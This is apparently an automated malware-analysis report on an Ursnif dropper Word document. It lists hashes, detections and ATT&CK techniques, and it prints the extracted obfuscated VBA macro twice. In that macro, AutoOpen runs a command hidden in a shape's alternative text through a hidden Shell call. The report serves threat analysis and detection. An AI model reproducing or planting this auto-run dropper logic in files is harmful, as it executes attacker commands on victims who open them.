Ursnif Office (OLE) malware analysis — malicious · 5a236ff345879f25

MALICIOUS

Office (OLE)

68.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 819b47b0d848b40227dbf462565c528a SHA-1: f846a48ef8ecbecc858c22e54361f1cb8a2118e2 SHA-256: 5a236ff345879f257c7123fc39f5b966911978be0e47150c57fa1a87f3f41c28

142 Risk Score

Malware Insights

Ursnif · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Ursnif-6864686-0. Static analysis revealed the presence of VBA macros, specifically an AutoOpen macro, which is a common technique for Ursnif. The AutoOpen macro is designed to execute a command, likely to download and run a second-stage payload, as indicated by the use of Interaction.Shell and the AlternativeText property of a shape.

Heuristics 5

ClamAV: Doc.Dropper.Ursnif-6864686-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Ursnif-6864686-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1806 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1806 bytes
SHA-256: `654a711e3b0634f16c28ba96a076370cdc2fb841fb2be8c1b8fef4ba908adb91`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "ppohyda" Function ftHXPK() Dim ffokibivabe As Integer Dim nnygo As Long ffokibivabe = 7374# - 3326# Dim lxeryrepuru As Variant lxeryrepuru = ffokibivabe - 9069# Dim jrepukefa As Integer Dim YyoJly As Long jrepukefa = 9388# - 8242# Dim iLJkwhb As Variant iLJkwhb = jrepukefa - 2825# Dim thicyp As Integer Dim iwInzzm As Long thicyp = 7526# - 1517# Dim pTrYq As Variant pTrYq = thicyp - 5078# Set ftHXPK = ActiveDocument.Shapes(2) Dim vtiqiqa As Integer Dim zKwcdMC As Long vtiqiqa = 1563# - 2810# Dim afhyEpjY As Variant afhyEpjY = vtiqiqa - 8775# Dim oovgz As Integer Dim VCQvB As Long oovgz = 4552# - 9221# Dim koILg As Variant koILg = oovgz - 7069# End Function Sub AutoOpen() Set ndeka = ftHXPK bsyvaneji = ftHXPK.AlternativeText Dim qjymikidyxu As Integer Dim vJyjfg As Long qjymikidyxu = 8040# - 3076# Dim cAENJA As Variant cAENJA = qjymikidyxu - 6342# Dim lleduzex As Integer Dim PPGnnR As Long lleduzex = 1118# - 5326# Dim FouPk As Variant FouPk = lleduzex - 8226# Interaction.Shell@ _ bsyvaneji, vbHide Dim VKASrL As Integer Dim txucizogule As Long VKASrL = 8272# - 8805# Dim rsymot As Variant rsymot = VKASrL - 9210# Dim nxicywyveki As Integer Dim progule As Long nxicywyveki = 4376# - 6163# Dim wvujiximu As Variant wvujiximu = nxicywyveki - 6248# Dim xUBLHHX As Integer Dim rjovixixy As Long xUBLHHX = 7156# - 4953# Dim LnsRS As Variant LnsRS = xUBLHHX - 2013# End Sub

SHA-256: 654a711e3b0634f16c28ba96a076370cdc2fb841fb2be8c1b8fef4ba908adb91

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ppohyda"
Function ftHXPK()

Dim ffokibivabe As Integer
Dim nnygo As Long
ffokibivabe = 7374# - 3326#
Dim lxeryrepuru As Variant
lxeryrepuru = ffokibivabe - 9069#

Dim jrepukefa As Integer
Dim YyoJly As Long
jrepukefa = 9388# - 8242#
Dim iLJkwhb As Variant
iLJkwhb = jrepukefa - 2825#

Dim thicyp As Integer
Dim iwInzzm As Long
thicyp = 7526# - 1517#
Dim pTrYq As Variant
pTrYq = thicyp - 5078#





Set ftHXPK = ActiveDocument.Shapes(2)

Dim vtiqiqa As Integer
Dim zKwcdMC As Long
vtiqiqa = 1563# - 2810#
Dim afhyEpjY As Variant
afhyEpjY = vtiqiqa - 8775#

Dim oovgz As Integer
Dim VCQvB As Long
oovgz = 4552# - 9221#
Dim koILg As Variant
koILg = oovgz - 7069#

End Function
Sub AutoOpen()







Set ndeka = ftHXPK

bsyvaneji = ftHXPK.AlternativeText

Dim qjymikidyxu As Integer
Dim vJyjfg As Long
qjymikidyxu = 8040# - 3076#
Dim cAENJA As Variant
cAENJA = qjymikidyxu - 6342#

Dim lleduzex As Integer
Dim PPGnnR As Long
lleduzex = 1118# - 5326#
Dim FouPk As Variant
FouPk = lleduzex - 8226#

Interaction.Shell@ _
bsyvaneji, vbHide

Dim VKASrL As Integer
Dim txucizogule As Long
VKASrL = 8272# - 8805#
Dim rsymot As Variant
rsymot = VKASrL - 9210#

Dim nxicywyveki As Integer
Dim progule As Long
nxicywyveki = 4376# - 6163#
Dim wvujiximu As Variant
wvujiximu = nxicywyveki - 6248#



Dim xUBLHHX As Integer
Dim rjovixixy As Long
xUBLHHX = 7156# - 4953#
Dim LnsRS As Variant
LnsRS = xUBLHHX - 2013#

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.